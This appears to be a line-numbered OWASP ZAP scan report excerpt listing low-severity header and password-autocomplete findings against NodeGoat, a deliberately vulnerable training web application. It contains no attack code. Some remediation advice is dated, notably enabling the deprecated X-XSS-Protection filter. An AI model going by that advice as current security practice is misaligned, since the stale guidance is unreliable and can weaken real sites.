1381 | 1382 | 1383 | 1384 | 1385 | 1386 | 1387 | 1388 | 1389 | 1390 | 1391 | 1392 | 1393 | 1394 | 1395 | 1396 | 1397 | 1398 | 1399 | 1400 | 1401 | 1402 | 1403 | 1404 | 1405 | 1406 | 1407 | 1408 | 1409 | 1410 | 1411 | 1412 | 1413 | 1414 | 1415 | 1416 | 1417 | 1418 | 1419 | 1420 | 1421 | 1422 | 1423 | 1424 | 1425 | 1426 | 1427 | 1428 | 1429 | 1430 | 1431 | 1432 | 1433 | 1434 | 1435 | 1436 | 1437 | 1438 | 1439 | 1440 | 1441 | 1442 | 1443 | 1444 | 1445 | 1446 | 1447 | 1448 | 1449 | 1450 | 1451 | 1452 | 1453 | 1454 | 1455 | 1456 | 1457 | 1458 | 1459 | 1460 | 1461 | 1462 | 1463 | 1464 | 1465 | 1466 | 1467 | 1468 | 1469 | 1470 | 1471 | 1472 | 1473 | 1474 | 1475 | 1476 | 1477 | 1478 | 1479 | 1480 | 1481 | 1482 | 1483 | 1484 | 1485 | 1486 | 1487 | 1488 |
Low (Medium)Web Browser XSS Protection Not Enabled
Description

Web Browser XSS Protection is not enabled, or is disabled by the configuration of the 'X-XSS-Protection' HTTP response header on the web server

URLhttp://nodegoat.herokuapp.com/tutorial/a6
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/signup
MethodPOST
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/robots.txt
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/tutorial/a5
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/benefits
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/tutorial/redos
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/tutorial/a9%23npm%20outdated
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/tutorial/a4
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/signup
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/sitemap.xml
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/tutorial/a3
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/login
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/tutorial/a2
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/tutorial
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/tutorial/a1
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/tutorial/a9
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/allocations/6
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/dashboard
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/tutorial/a8
MethodGET
ParameterX-XSS-Protection
URLhttp://nodegoat.herokuapp.com/ZAP
MethodGET
ParameterX-XSS-Protection
Instances25
Solution

Ensure that the web browser's XSS filter is enabled, by setting the X-XSS-Protection HTTP response header to '1'.

Other information

The X-XSS-Protection HTTP response header allows the web server to enable or disable the web browser's XSS protection mechanism. The following values would attempt to enable it:

X-XSS-Protection: 1; mode=block

X-XSS-Protection: 1; report=http://www.example.com/xss

The following values would disable it:

X-XSS-Protection: 0

The X-XSS-Protection HTTP response header is currently supported on Internet Explorer, Chrome and Safari (WebKit).

Note that this alert is only raised if the response body could potentially contain an XSS payload (with a text-based content type, with a non-zero length).

Reference

https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

https://blog.veracode.com/2014/03/guidelines-for-setting-security-headers/

CWE Id933
WASC Id14
Source ID3
1489 |
1490 | 1491 | 1492 | 1493 | 1494 | 1495 | 1496 | 1497 | 1498 | 1499 | 1500 | 1501 | 1502 | 1503 | 1504 | 1505 | 1506 | 1507 | 1508 | 1509 | 1510 | 1511 | 1512 | 1513 | 1514 | 1515 | 1516 | 1517 | 1518 | 1519 | 1520 | 1521 | 1522 | 1523 | 1524 | 1525 | 1526 | 1527 | 1528 | 1529 | 1530 | 1531 | 1532 | 1533 | 1534 | 1535 | 1536 | 1537 | 1538 | 1539 | 1540 | 1541 | 1542 | 1543 | 1544 | 1545 | 1546 | 1547 | 1548 | 1549 | 1550 | 1551 | 1552 | 1553 | 1554 | 1555 | 1556 | 1557 | 1558 | 1559 | 1560 | 1561 | 1562 | 1563 | 1564 | 1565 | 1566 | 1567 | 1568 | 1569 | 1570 | 1571 | 1572 | 1573 | 1574 | 1575 | 1576 | 1577 | 1578 | 1579 | 1580 | 1581 | 1582 | 1583 | 1584 | 1585 | 1586 | 1587 | 1588 | 1589 | 1590 | 1591 | 1592 | 1593 | 1594 | 1595 | 1596 | 1597 | 1598 | 1599 | 1600 | 1601 | 1602 | 1603 | 1604 | 1605 | 1606 | 1607 | 1608 | 1609 | 1610 | 1611 | 1612 | 1613 | 1614 | 1615 | 1616 | 1617 | 1618 | 1619 | 1620 | 1621 | 1622 | 1623 | 1624 | 1625 | 1626 | 1627 | 1628 | 1629 | 1630 | 1631 | 1632 | 1633 | 1634 | 1635 | 1636 | 1637 | 1638 | 1639 | 1640 | 1641 | 1642 | 1643 | 1644 | 1645 | 1646 | 1647 | 1648 | 1649 | 1650 | 1651 | 1652 | 1653 | 1654 | 1655 | 1656 | 1657 | 1658 | 1659 | 1660 | 1661 | 1662 | 1663 | 1664 | 1665 | 1666 | 1667 | 1668 | 1669 | 1670 | 1671 | 1672 | 1673 | 1674 | 1675 | 1676 | 1677 | 1678 | 1679 | 1680 | 1681 | 1682 | 1683 | 1684 | 1685 | 1686 | 1687 | 1688 | 1689 | 1690 | 1691 | 1692 | 1693 | 1694 | 1695 | 1696 | 1697 | 1698 | 1699 | 1700 | 1701 | 1702 | 1703 | 1704 | 1705 | 1706 | 1707 | 1708 | 1709 | 1710 | 1711 | 1712 | 1713 | 1714 | 1715 | 1716 | 1717 | 1718 | 1719 | 1720 | 1721 | 1722 | 1723 | 1724 | 1725 | 1726 | 1727 | 1728 | 1729 | 1730 | 1731 | 1732 | 1733 | 1734 | 1735 | 1736 | 1737 | 1738 | 1739 | 1740 | 1741 | 1742 | 1743 | 1744 | 1745 | 1746 | 1747 | 1748 | 1749 | 1750 | 1751 | 1752 | 1753 | 1754 | 1755 | 1756 | 1757 | 1758 | 1759 | 1760 | 1761 | 1762 | 1763 | 1764 | 1765 | 1766 | 1767 | 1768 | 1769 | 1770 | 1771 | 1772 | 1773 | 1774 | 1775 | 1776 | 1777 | 1778 | 1779 | 1780 | 1781 | 1782 | 1783 | 1784 | 1785 | 1786 | 1787 | 1788 | 1789 | 1790 | 1791 | 1792 | 1793 | 1794 | 1795 | 1796 | 1797 | 1798 | 1799 | 1800 | 1801 | 1802 | 1803 | 1804 | 1805 | 1806 | 1807 | 1808 | 1809 | 1810 | 1811 | 1812 | 1813 | 1814 | 1815 | 1816 | 1817 | 1818 | 1819 | 1820 | 1821 |
Low (Medium)X-Content-Type-Options Header Missing
Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

URLhttp://nodegoat.herokuapp.com/memos
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/tutorial/a9
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/allocations/6
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/tutorial/a1
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/tutorial
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/images/owasplogo.png
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/vendor/chart/raphael-min.js
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/tutorial/a2
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/login
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/vendor/theme/sb-admin.css
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/vendor/bootstrap/bootstrap-tour.js
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/tutorial/a7
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/tutorial/a10
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/dashboard
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/tutorial/redos
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/tutorial/a8
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/js/tour/redirects-steps.js
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/vendor/chart/morris-0.4.3.min.js
MethodGET
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/signup
MethodPOST
ParameterX-Content-Type-Options
URLhttp://nodegoat.herokuapp.com/vendor/html5shiv.js
MethodGET
ParameterX-Content-Type-Options
Instances34
Solution

Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

Other information

This issue still applies to error type pages (401, 403, 500, etc) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

At "High" threshold this scanner will not alert on client or server error responses.

Reference

http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx

https://www.owasp.org/index.php/List_of_useful_HTTP_headers

CWE Id16
WASC Id15
Source ID3
1822 |
1823 | 1824 | 1825 | 1826 | 1827 | 1828 | 1829 | 1830 | 1831 | 1832 | 1833 | 1834 | 1835 | 1836 | 1837 | 1838 | 1839 | 1840 | 1841 | 1842 | 1843 | 1844 | 1845 | 1846 | 1847 | 1848 | 1849 | 1850 | 1851 | 1852 | 1853 | 1854 | 1855 | 1856 | 1857 | 1858 | 1859 | 1860 | 1861 | 1862 | 1863 | 1864 | 1865 | 1866 | 1867 | 1868 | 1869 | 1870 | 1871 | 1872 | 1873 | 1874 | 1875 | 1876 | 1877 | 1878 | 1879 | 1880 | 1881 | 1882 | 1883 | 1884 | 1885 | 1886 | 1887 | 1888 | 1889 | 1890 | 1891 | 1892 | 1893 | 1894 | 1895 | 1896 | 1897 | 1898 | 1899 | 1900 | 1901 | 1902 | 1903 | 1904 | 1905 | 1906 | 1907 | 1908 | 1909 | 1910 | 1911 | 1912 | 1913 | 1914 | 1915 | 1916 | 1917 | 1918 | 1919 | 1920 | 1921 | 1922 | 1923 | 1924 | 1925 | 1926 | 1927 | 1928 | 1929 | 1930 | 1931 | 1932 | 1933 | 1934 | 1935 | 1936 | 1937 | 1938 | 1939 | 1940 | 1941 | 1942 | 1943 | 1944 | 1945 | 1946 | 1947 | 1948 | 1949 | 1950 | 1951 | 1952 | 1953 | 1954 | 1955 | 1956 | 1957 |
Low (Medium)Password Autocomplete in Browser
Description

The AUTOCOMPLETE attribute is not disabled on an HTML FORM/INPUT element containing password type input. Passwords may be stored in browsers and retrieved.

URLhttp://nodegoat.herokuapp.com/signup
MethodPOST
Parameterverify
Evidence<input type="password" class="form-control" id="verify" name="verify" value="" placeholder="Enter password">
URLhttp://nodegoat.herokuapp.com/login
MethodGET
Parameterpassword
Evidence<input type="password" class="form-control" id="password" name="password" value="" placeholder="Enter Password">
URLhttp://nodegoat.herokuapp.com/signup
MethodGET
Parameterverify
Evidence<input type="password" class="form-control" id="verify" name="verify" value="" placeholder="Enter password">
URLhttp://nodegoat.herokuapp.com/signup
MethodGET
Parameterpassword
Evidence<input type="password" class="form-control" id="password" name="password" value="" placeholder="Enter password">
URLhttp://nodegoat.herokuapp.com/signup
MethodPOST
Parameterpassword
Evidence<input type="password" class="form-control" id="password" name="password" value="" placeholder="Enter password">
Instances5
Solution

Turn off the AUTOCOMPLETE attribute in forms or individual input elements containing password inputs by using AUTOCOMPLETE='OFF'.

Reference

http://www.w3schools.com/tags/att_input_autocomplete.asp

https://msdn.microsoft.com/en-us/library/ms533486%28v=vs.85%29.aspx

CWE Id525
WASC Id15
Source ID3
1958 |
1959 | 1960 | 1961 | 1962 | 1963 | 1964 | 1965 | 1966 | 1967 | 1968 | 1969 | 1970 | 1971 | 1972 | 1973 | 1974 | 1975 | 1976 | 1977 | 1978 | 1979 | 1980 | 1981 | 1982 | 1983 | 1984 | 1985 | 1986 | 1987 | 1988 | 1989 | 1990 | 1991 | 1992 | 1993 | 1994 | 1995 | 1996 | 1997 | 1998 | 1999 | 2000 | 2001 | 2002 | 2003 | 2004 | 2005 | 2006 | 2007 | 2008 | 2009 | 2010 | 2011 | 2012 | 2013 | 2014 | 2015 | 2016 | 2017 | 2018 | 2019 | 2020 | 2021 | 2022 | 2023 | 2024 |
Low (Medium)X-Content-Type-Options Header Missing
Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

URLhttp://www.msftncsi.com/ncsi.txt
MethodGET
ParameterX-Content-Type-Options
Instances1
Solution

Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

Other information

This issue still applies to error type pages (401, 403, 500, etc) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

At "High" threshold this scanner will not alert on client or server error responses.

Reference

http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx

https://www.owasp.org/index.php/List_of_useful_HTTP_headers

CWE Id16
WASC Id15
Source ID3
2025 | 2026 | 2027 | --------------------------------------------------------------------------------